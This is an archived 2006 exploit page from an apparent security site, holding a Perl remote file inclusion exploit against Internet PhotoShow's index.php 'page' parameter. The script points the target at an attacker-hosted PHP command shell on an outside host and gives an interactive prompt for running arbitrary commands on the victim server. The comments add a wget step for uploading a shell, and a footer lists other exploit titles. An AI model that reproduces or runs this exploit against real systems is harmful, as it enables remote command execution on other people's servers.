exploits , vulnerabilities , articles , Internet PhotoShow (page) Remote File Inclusion Exploit

2006-04-18

Internet PhotoShow (page) Remote File Inclusion Exploit

Rated as : Moderate Risk

#!/usr/bin/perl
#
# Exploit by Hessam-x (www.hessamx.net)
# sub usage()
# {
 #print " Usage: perl hx.pl [host] [cmd shell] [cmd shell
variable]\r\n\n";
 #print " example : perl hx.pl www.milw0rm.com milw0rm.com/hx.txt
cmd";
 #exit();
 #}
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
# \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
#                 DeltaHAcking Team                  #
#           website: www.deltahacking.com            #
######################################################
#  Internet PhotoShow Remote File Inclusion Exploit  #
######################################################
# upload a shell with this xpl:
# wget http://shell location/
use LWP::UserAgent;
print "-------------------------------------------\n";
print "=             Internet PhotoShow          =\n";
print "=       By Hessam-x  - www.hackerz.ir     =\n";
print "-------------------------------------------\n\n";


$bPath = $ARGV[0];
$cmdo = $ARGV[1];
$bcmd = $ARGV[2];

if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()}



while()
{
       print "Hessam-x@PhotoShow \$";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET
=>$bpath.'index.php?page='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n[-]
Could not connect !\n";

$res = $xpl->request($req);

$return = $res->content;
$return =~ tr/[\n]/[ê]/;

if (!$cmd) {print "\n[!] Please type a Command\n\n"; $return
="";}

elsif ($return =~/failed to open stream: HTTP request failed!/)
       {print "\n[-] Could Not Connect to cmd Host\n";exit}
elsif ($return =~/^<b>Fatal.error/) {print "\n[-] Invalid
Command\n"}

if($return =~ /(.*)/)


{
       $freturn = $1;
       $freturn=~ tr/[ê]/[\n]/;
       print "\r\n$freturn\n\r";
       last;
}

else {print "Hessam-x@PhotoShow \$";}}}last;


sub usage()
 {
print "[!] Usage : hx.pl [host] [cmd shell location] [cmd shell
variable]\n";
print " - E.g : hx.pl http://www.milw0rm.com
http://www.milw0rm.com/shell.txt cmd\n";
 exit();
 }
securitydot.net - 2006-04-18

Exploits - newest 10 RSS | More

2007-06-15 56120 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33417 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41552 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28780 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19311 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16329 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18964 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16209 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33028 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16844 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit